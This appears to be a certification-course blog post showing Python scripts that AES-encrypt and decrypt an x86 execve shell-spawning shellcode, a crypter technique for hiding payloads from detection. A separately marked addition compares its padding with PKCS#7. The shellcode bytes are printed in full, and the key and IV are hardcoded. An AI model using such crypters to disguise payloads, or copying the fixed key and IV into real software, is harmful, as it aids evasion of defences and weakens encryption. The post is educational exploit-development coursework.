This is the last one, and it is about writing a crypter/decrypter. I used Python and pycrypto for this task. The execve shellcode starts a shell. The scripts use AES for encryption and decryption.
Here is the code for encryption:
encode.py
    from Crypto.Cipher import AES

    # execve shellcode that starts a shell
    plain = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

    # AES in CBC mode with a 16-byte key and a 16-byte IV
    obj = AES.new('Passphrase123456', AES.MODE_CBC, 'IVIVIVIVIVI12345')

    # pad the shellcode to a multiple of the 16-byte AES block size
    l = len(plain)
    r = l % 16
    p = 16 - r
    print "offset: " + str(p)
    plain = plain + "A" * p

    ciph = obj.encrypt(plain)

    # print the ciphertext as \xNN escapes
    encoded = ""
    for x in bytearray(ciph):
        encoded += '\\x'
        enc = '%02x' % x
        encoded += enc
    print encoded

The output first shows the offset, which is the number of padding bytes appended so that the shellcode length is a multiple of the 16-byte AES block size. This offset is needed later in the decryption code.
The offset and the encrypted shellcode have to be copied into the decryption code. And here is the decryption code:
decode.py
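    from Crypto.Cipher import AES

    # number of padding bytes reported by encode.py
    offset = 7
    # encrypted shellcode printed by encode.py
    ciph = ("\x2c\x5a\xd5\x5f\x2d\x16\xb6\xb9\x68\x30\x90\x9f\xc9\x6d\xa5\x45\x8a\x08\x01\x2e\xe6\x60\x5b\x9f\x23\xb4\xc5\xaa\x77\x0f\x8a\x7f")

    # same key, mode and IV as in encode.py
    obj = AES.new('Passphrase123456', AES.MODE_CBC, 'IVIVIVIVIVI12345')
    t = obj.decrypt(ciph)

    # print the plaintext as \xNN escapes
    decoded = ""
    for x in bytearray(t):
        decoded += '\\x'
        enc = '%02x' % (x & 0xff)
        decoded += enc
    # each byte is printed as four characters, so drop offset*4 of them
    print decoded[0:-offset*4]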
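The padding arithmetic behind the offset, as an added example that is not part of the original scripts: it compares the "A" filler plus out-of-band offset used above with PKCS#7 padding, which stores the padding length in the data itself. It is Python 3 with the standard library only and performs no encryption; all function names are hypothetical and the sample bytes are constructed.

```python
BLOCK = 16  # AES block size in bytes

def page_pad(data: bytes, filler: bytes = b"A"):
    """Scheme used by encode.py: append filler, return (padded, offset); offset is 1..16."""
    offset = BLOCK - len(data) % BLOCK
    return data + filler * offset, offset

def page_unpad(padded: bytes, offset: int) -> bytes:
    """Strip the filler; the offset has to be carried separately, as in decode.py."""
    if not 1 <= offset <= BLOCK or offset > len(padded):
        raise ValueError("offset out of range")
    return padded[:-offset]

def pkcs7_pad(data: bytes) -> bytes:
    """PKCS#7: every padding byte holds the padding length."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(padded: bytes) -> bytes:
    """Read the length from the last byte and verify every padding byte."""
    if not padded or len(padded) % BLOCK:
        raise ValueError("length is not a multiple of the block size")
    n = padded[-1]
    if not 1 <= n <= BLOCK or padded[-n:] != bytes([n]) * n:
        raise ValueError("invalid PKCS#7 padding")
    return padded[:-n]

def hex_escape(data: bytes) -> str:
    """Render bytes as \\xNN text, four characters per byte, like the scripts above."""
    return "".join("\\x%02x" % b for b in data)

if __name__ == "__main__":
    sample = bytes(range(25))  # constructed input with the same length as the shellcode above
    padded, offset = page_pad(sample)
    print("offset:", offset, "padded length:", len(padded))
    # decode.py's slice: four printed characters per padding byte
    print(hex_escape(padded)[:-offset * 4] == hex_escape(sample))
    print(pkcs7_unpad(pkcs7_pad(sample)) == sample)
```

Because the offset is always between 1 and 16, the slice `decoded[0:-offset*4]` never becomes `[0:-0]`, which would return an empty string.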
Get the code.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-342